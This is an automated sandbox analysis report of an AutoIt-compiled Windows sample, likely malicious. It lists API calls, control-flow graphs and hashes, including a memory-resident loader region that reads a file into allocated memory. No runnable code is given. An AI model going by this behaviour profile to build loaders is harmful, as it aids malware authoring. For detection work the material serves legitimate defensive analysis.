                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00890BBB
                              • timeGetTime.WINMM ref: 00890E76
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00890FB3
                              • TranslateMessage.USER32(?), ref: 00890FC7
                              • DispatchMessageW.USER32(?), ref: 00890FD5
                              • Sleep.KERNEL32(0000000A), ref: 00890FDF
                              • LockWindowUpdate.USER32(00000000,?,?), ref: 0089105A
                              • DestroyWindow.USER32 ref: 00891066
                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00891080
                              • Sleep.KERNEL32(0000000A,?,?), ref: 008C52AD
                              • TranslateMessage.USER32(?), ref: 008C608A
                              • DispatchMessageW.USER32(?), ref: 008C6098
                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008C60AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                              • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                              • API String ID: 4003667617-3242690629
                              • Opcode ID: 1455b4919bebdc807a41d057bc19886afcb07df75ead32dcb3adec37614f466d
                              • Instruction ID: 6f47c092f7adc2afc7b5f4e30988f45ea88e566af365fe7948ff1d35d17878d5
                              • Opcode Fuzzy Hash: 1455b4919bebdc807a41d057bc19886afcb07df75ead32dcb3adec37614f466d
                              • Instruction Fuzzy Hash: 4BB28F70608741DFDB28EB24C894F6AB7E5FF85304F18491DE49AD72A1DB71E984CB82
                              Function 008E93DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 008E91E9: __time64.LIBCMT ref: 008E91F3
                                • Part of subcall function 00885045: _fseek.LIBCMT ref: 0088505D
                              • __wsplitpath.LIBCMT ref: 008E94BE
                                • Part of subcall function 008A432E: __wsplitpath_helper.LIBCMT ref: 008A436E
                              • _wcscpy.LIBCMT ref: 008E94D1
                              • _wcscat.LIBCMT ref: 008E94E4
                              • __wsplitpath.LIBCMT ref: 008E9509
                              • _wcscat.LIBCMT ref: 008E951F
                              • _wcscat.LIBCMT ref: 008E9532
                                • Part of subcall function 008E922F: _memmove.LIBCMT ref: 008E9268
                                • Part of subcall function 008E922F: _memmove.LIBCMT ref: 008E9277
                              • _wcscmp.LIBCMT ref: 008E9479
                                • Part of subcall function 008E99BE: _wcscmp.LIBCMT ref: 008E9AAE
                                • Part of subcall function 008E99BE: _wcscmp.LIBCMT ref: 008E9AC1
                              • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008E96DC
                              • _wcsncpy.LIBCMT ref: 008E974F
                              • DeleteFileW.KERNEL32(?,?), ref: 008E9785
                              • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 008E979B
                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008E97AC
                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008E97BE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                              • String ID:
                              • API String ID: 1500180987-0
                              • Opcode ID: 9799290b4dc179175d3e23bdaa5eb60455453eaafa53454cf3b3e2dfc916a0b6
                              • Instruction ID: f2d68174cc297901038ee72f245728a65e4dd410d671cdc1c8e41907d2a0f541
                              • Opcode Fuzzy Hash: 9799290b4dc179175d3e23bdaa5eb60455453eaafa53454cf3b3e2dfc916a0b6
                              • Instruction Fuzzy Hash: 9CC11CB1D00219AEDF21DF99CC85ADEB7BDFF55310F0040AAF609E6251EB709A848F65
                              Function 00883015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71windowregistryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetSysColorBrush.USER32(0000000F), ref: 00883074
                              • RegisterClassExW.USER32(00000030), ref: 0088309E
                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008830AF
                              • InitCommonControlsEx.COMCTL32(?), ref: 008830CC
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008830DC
                              • LoadIconW.USER32(000000A9), ref: 008830F2
                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00883101
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                              • API String ID: 2914291525-1005189915
                              • Opcode ID: 1f98e9e92a54215c0c05fcf1a836caa9a425086a3bdc922ac0fa8b5daf656ce0
                              • Instruction ID: 32c6afa0f4624543f6cca9aeb3244529d7dd34ad4364af434543392857c2c867
                              • Opcode Fuzzy Hash: 1f98e9e92a54215c0c05fcf1a836caa9a425086a3bdc922ac0fa8b5daf656ce0
                              • Instruction Fuzzy Hash: D3318CB5829309EFDB10CFA4DC88AC9BFF4FB0A310F10416AE550E62A0D3B50645DF52
                              Function 00883041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetSysColorBrush.USER32(0000000F), ref: 00883074
                              • RegisterClassExW.USER32(00000030), ref: 0088309E
                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008830AF
                              • InitCommonControlsEx.COMCTL32(?), ref: 008830CC
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008830DC
                              • LoadIconW.USER32(000000A9), ref: 008830F2
                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00883101
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                              • API String ID: 2914291525-1005189915
                              • Opcode ID: 7900522be52abbe50b4d366173a4eb7461e8a220f19a72e67d8057f6d5b64df0
                              • Instruction ID: 1bf6c01e04f4d9c48b7130295c086bca98e4126d89ae04665af2e3afb1ed064a
                              • Opcode Fuzzy Hash: 7900522be52abbe50b4d366173a4eb7461e8a220f19a72e67d8057f6d5b64df0
                              • Instruction Fuzzy Hash: 7B21C7B5925318AFDB10DFA4EC59B9DBBF4FB0A704F00412AF510E62A0D7B14644AF92
                              Function 008871EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00884864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009462F8,?,008837C0,?), ref: 00884882
                                • Part of subcall function 008A074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,008872C5), ref: 008A0771
                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00887308
                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 008BECF1
                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 008BED32
                              • RegCloseKey.ADVAPI32(?), ref: 008BED70
                              • _wcscat.LIBCMT ref: 008BEDC9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                              • API String ID: 2673923337-2727554177
                              • Opcode ID: 145b2c3008e1470c8cf1c2a55a1cd56faf1091db99ac4851edb2a712adbdc180
                              • Instruction ID: 414b6e48fd46bd72b4022598eab469549fabc9a0f876fe3cc599f0dfafe7cbd3
                              • Opcode Fuzzy Hash: 145b2c3008e1470c8cf1c2a55a1cd56faf1091db99ac4851edb2a712adbdc180
                              • Instruction Fuzzy Hash: C0715B7511C3059EC324EFA9D881CABB7F8FB86740B44492EF455C32A0EBB09948DB92
                              Function 00883A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetSysColorBrush.USER32(0000000F), ref: 00883A62
                              • LoadCursorW.USER32(00000000,00007F00), ref: 00883A71
                              • LoadIconW.USER32(00000063), ref: 00883A88
                              • LoadIconW.USER32(000000A4), ref: 00883A9A
                              • LoadIconW.USER32(000000A2), ref: 00883AAC
                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00883AD2
                              • RegisterClassExW.USER32(?), ref: 00883B28
                                • Part of subcall function 00883041: GetSysColorBrush.USER32(0000000F), ref: 00883074
                                • Part of subcall function 00883041: RegisterClassExW.USER32(00000030), ref: 0088309E
                                • Part of subcall function 00883041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008830AF
                                • Part of subcall function 00883041: InitCommonControlsEx.COMCTL32(?), ref: 008830CC
                                • Part of subcall function 00883041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008830DC
                                • Part of subcall function 00883041: LoadIconW.USER32(000000A9), ref: 008830F2
                                • Part of subcall function 00883041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00883101
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                              • String ID: #$0$AutoIt v3
                              • API String ID: 423443420-4155596026
                              • Opcode ID: d4f2ba05abdf407f7bf1b82214f79dd41bbfdbf56ffd7f1fcb6f916e845faf84
                              • Instruction ID: df40e0142a417fc6fee6ed11a5b9b5914d0f3ee105b7b160fbfee4f257a3f3b2
                              • Opcode Fuzzy Hash: d4f2ba05abdf407f7bf1b82214f79dd41bbfdbf56ffd7f1fcb6f916e845faf84
                              • Instruction Fuzzy Hash: FF214DB5929308BFEB10DFA4EC19F9D7BB4FB0A711F000129E514E62A0D3B55654AF46
                              Function 00883633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 767 883633-883681 769 8836e1-8836e3 767->769 770 883683-883686 767->770 769->770 773 8836e5 769->773 771 883688-88368f 770->771 772 8836e7 770->772 774 88375d-883765 PostQuitMessage 771->774 775 883695-88369a 771->775 777 8836ed-8836f0 772->777 778 8bd31c-8bd34a call 8911d0 call 8911f3 772->778 776 8836ca-8836d2 DefWindowProcW 773->776 785 883711-883713 774->785 781 8bd38f-8bd3a3 call 8e2a16 775->781 782 8836a0-8836a2 775->782 784 8836d8-8836de 776->784 779 8836f2-8836f3 777->779 780 883715-88373c SetTimer RegisterWindowMessageW 777->780 814 8bd34f-8bd356 778->814 786 8836f9-88370c KillTimer call 8844cb call 883114 779->786 787 8bd2bf-8bd2c2 779->787 780->785 788 88373e-883749 CreatePopupMenu 780->788 781->785 807 8bd3a9 781->807 789 8836a8-8836ad 782->789 790 883767-883776 call 884531 782->790 785->784 786->785 793 8bd2f8-8bd317 MoveWindow 787->793 794 8bd2c4-8bd2c6 787->794 788->785 796 8836b3-8836b8 789->796 797 8bd374-8bd37b 789->797 790->785 793->785 801 8bd2c8-8bd2cb 794->801 802 8bd2e7-8bd2f3 SetFocus 794->802 805 88374b-88375b call 8845df 796->805 806 8836be-8836c4 796->806 797->776 804 8bd381-8bd38a call 8d817e 797->804 801->806 810 8bd2d1-8bd2e2 call 8911d0 801->810 802->785 804->776 805->785 806->776 806->814 807->776 810->785 814->776 818 8bd35c-8bd36f call 8844cb call 8843db 814->818 818->776
                              APIs
                              • DefWindowProcW.USER32(?,?,?,?), ref: 008836D2
                              • KillTimer.USER32(?,00000001), ref: 008836FC
                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0088371F
                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0088372A
                              • CreatePopupMenu.USER32 ref: 0088373E
                              • PostQuitMessage.USER32(00000000), ref: 0088375F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                              • String ID: TaskbarCreated
                              • API String ID: 129472671-2362178303
                              • Opcode ID: a8f423069ecde170e4196f125cf97a1418e367acbfac37e81021e6ac7d96e408
                              • Instruction ID: 0c062564df891e824807cee73e0d8f50918cce7d87a9ae7672ca2534f889320a
                              • Opcode Fuzzy Hash: a8f423069ecde170e4196f125cf97a1418e367acbfac37e81021e6ac7d96e408
                              • Instruction Fuzzy Hash: 3C41D4F2218209BBDF24BB6CDC09F793795F716700F140539F602C63A2EAA19A04A763
                              Function 00883778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                              Download Yara Rule

                              Control-flow Graph

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                              • API String ID: 1825951767-3513169116
                              • Opcode ID: 9571e50688a45498e4ca7667b6f4d3f74549d06b89693c1229e78449a6665441
                              • Instruction ID: 612914fbd74f6a5e537aa7e687dd5b857ea40c9cbd290cb70931d0a9526e5bc7
                              • Opcode Fuzzy Hash: 9571e50688a45498e4ca7667b6f4d3f74549d06b89693c1229e78449a6665441
                              • Instruction Fuzzy Hash: 5BA14F75910229AACB14FBA8CC95DEEB778FF15700F540429F412F7191EF749A05CB62
                              Function 01102630 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 942 1102630-11026de call 1100000 945 11026e5-110270b call 1103540 CreateFileW 942->945 948 1102712-1102722 945->948 949 110270d 945->949 956 1102724 948->956 957 1102729-1102743 VirtualAlloc 948->957 950 110285d-1102861 949->950 951 11028a3-11028a6 950->951 952 1102863-1102867 950->952 958 11028a9-11028b0 951->958 954 1102873-1102877 952->954 955 1102869-110286c 952->955 959 1102887-110288b 954->959 960 1102879-1102883 954->960 955->954 956->950 961 1102745 957->961 962 110274a-1102761 ReadFile 957->962 963 11028b2-11028bd 958->963 964 1102905-110291a 958->964 967 110289b 959->967 968 110288d-1102897 959->968 960->959 961->950 969 1102763 962->969 970 1102768-11027a8 VirtualAlloc 962->970 971 11028c1-11028cd 963->971 972 11028bf 963->972 965 110292a-1102932 964->965 966 110291c-1102927 VirtualFree 964->966 966->965 967->951 968->967 969->950 975 11027aa 970->975 976 11027af-11027ca call 1103790 970->976 973 11028e1-11028ed 971->973 974 11028cf-11028df 971->974 972->964 979 11028fa-1102900 973->979 980 11028ef-11028f8 973->980 978 1102903 974->978 975->950 982 11027d5-11027df 976->982 978->958 979->978 980->978 983 11027e1-1102810 call 1103790 982->983 984 1102812-1102826 call 11035a0 982->984 983->982 990 1102828 984->990 991 110282a-110282e 984->991 990->950 992 1102830-1102834 FindCloseChangeNotification 991->992 993 110283a-110283e 991->993 992->993 994 1102840-110284b VirtualFree 993->994 995 110284e-1102857 993->995 994->995 995->945 995->950
                              APIs
                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01102701
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01102927
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659776671.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1100000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CreateFileFreeVirtual
                              • String ID:
                              • API String ID: 204039940-0
                              • Opcode ID: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                              • Instruction ID: 52bb2f4b3558577fc4c7d824856e79c6779ac16ce4106fd21ac2a8b03c954110
                              • Opcode Fuzzy Hash: 640a513b0a1dc75cf27b9d1dcd7263df352c7e5bc7e4f1208c2f85c57f315c64
                              • Instruction Fuzzy Hash: BCA11674E00219EBDB19CFA4C898BEEBBB5BF48304F208159E615BB2C0D7B59A41CB55
                              Function 008839E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1073 8839e7-883a57 CreateWindowExW * 2 ShowWindow * 2
                              APIs
                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00883A15
                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00883A36
                              • ShowWindow.USER32(00000000,?,?), ref: 00883A4A
                              • ShowWindow.USER32(00000000,?,?), ref: 00883A53
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$CreateShow
                              • String ID: AutoIt v3$edit
                              • API String ID: 1584632944-3779509399
                              • Opcode ID: 9db71cfde89f3d44930474eb2db5bc0540e67006e9609b7098df524f905c264d
                              • Instruction ID: b002539d82f0211c691fb1fa65c1fff7590ad12d698d34ae1fef628522557432
                              • Opcode Fuzzy Hash: 9db71cfde89f3d44930474eb2db5bc0540e67006e9609b7098df524f905c264d
                              • Instruction Fuzzy Hash: 16F03AB4665290BEEB3117276C18E273E7DE7C7F50B00012AB910E21B0C2E50800EAB2
                              Function 011023B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162fileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1074 11023b0-1102529 call 1100000 call 11022a0 CreateFileW 1081 1102530-1102540 1074->1081 1082 110252b 1074->1082 1085 1102542 1081->1085 1086 1102547-1102561 VirtualAlloc 1081->1086 1083 11025e0-11025e5 1082->1083 1085->1083 1087 1102563 1086->1087 1088 1102565-110257c ReadFile 1086->1088 1087->1083 1089 1102580-11025ba call 11022e0 call 11012a0 1088->1089 1090 110257e 1088->1090 1095 11025d6-11025de ExitProcess 1089->1095 1096 11025bc-11025d1 call 1102330 1089->1096 1090->1083 1095->1083 1096->1095
                              APIs
                                • Part of subcall function 011022A0: Sleep.KERNELBASE(000001F4), ref: 011022B1
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0110251C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659776671.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1100000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CreateFileSleep
                              • String ID: 43GVE1URGKC4EJDGTK5UM1F2TMU4
                              • API String ID: 2694422964-467979337
                              • Opcode ID: 273b8836ccad534bc7504cc77f8600c97d60c8046a469dda9c14ebdf15a2795d
                              • Instruction ID: b953508cf78c81c65f3b1a4b5441650371cfe5d3129f76e25c515067a141940a
                              • Opcode Fuzzy Hash: 273b8836ccad534bc7504cc77f8600c97d60c8046a469dda9c14ebdf15a2795d
                              • Instruction Fuzzy Hash: E5618530D04288DBEF16DBE4C8587DEBB75AF19304F044199D2497B2C1D7BA1B45CB6A
                              Function 008A564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1098 8a564d-8a5666 1099 8a5668-8a566d 1098->1099 1100 8a5683 1098->1100 1099->1100 1102 8a566f-8a5671 1099->1102 1101 8a5685-8a568b 1100->1101 1103 8a568c-8a5691 1102->1103 1104 8a5673-8a5678 call 8a8d68 1102->1104 1106 8a569f-8a56a3 1103->1106 1107 8a5693-8a569d 1103->1107 1114 8a567e call 8a8ff6 1104->1114 1110 8a56b3-8a56b5 1106->1110 1111 8a56a5-8a56b0 call 8a3020 1106->1111 1107->1106 1109 8a56c3-8a56d2 1107->1109 1112 8a56d9 1109->1112 1113 8a56d4-8a56d7 1109->1113 1110->1104 1116 8a56b7-8a56c1 1110->1116 1111->1110 1117 8a56de-8a56e3 1112->1117 1113->1117 1114->1100 1116->1104 1116->1109 1120 8a56e9-8a56f0 1117->1120 1121 8a57cc-8a57cf 1117->1121 1122 8a56f2-8a56fa 1120->1122 1123 8a5731-8a5733 1120->1123 1121->1101 1122->1123 1124 8a56fc 1122->1124 1125 8a579d-8a579e call 8b0df7 1123->1125 1126 8a5735-8a5737 1123->1126 1127 8a57fa 1124->1127 1128 8a5702-8a5704 1124->1128 1137 8a57a3-8a57a7 1125->1137 1130 8a575b-8a5766 1126->1130 1131 8a5739-8a5741 1126->1131 1136 8a57fe-8a5807 1127->1136 1134 8a570b-8a5710 1128->1134 1135 8a5706-8a5708 1128->1135 1132 8a576a-8a576d 1130->1132 1133 8a5768 1130->1133 1138 8a5743-8a574f 1131->1138 1139 8a5751-8a5755 1131->1139 1142 8a576f-8a577b call 8a4916 call 8b10ab 1132->1142 1143 8a57d4-8a57d8 1132->1143 1133->1132 1134->1143 1144 8a5716-8a572f call 8b0f18 1134->1144 1135->1134 1136->1101 1137->1136 1140 8a57a9-8a57ae 1137->1140 1141 8a5757-8a5759 1138->1141 1139->1141 1140->1143 1145 8a57b0-8a57c1 1140->1145 1141->1132 1159 8a5780-8a5785 1142->1159 1146 8a57ea-8a57f5 call 8a8d68 1143->1146 1147 8a57da-8a57e7 call 8a3020 1143->1147 1158 8a5792-8a579b 1144->1158 1150 8a57c4-8a57c6 1145->1150 1146->1114 1147->1146 1150->1120 1150->1121 1158->1150 1160 8a578b-8a578e 1159->1160 1161 8a580c-8a5810 1159->1161 1160->1127 1162 8a5790 1160->1162 1161->1136 1162->1158
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
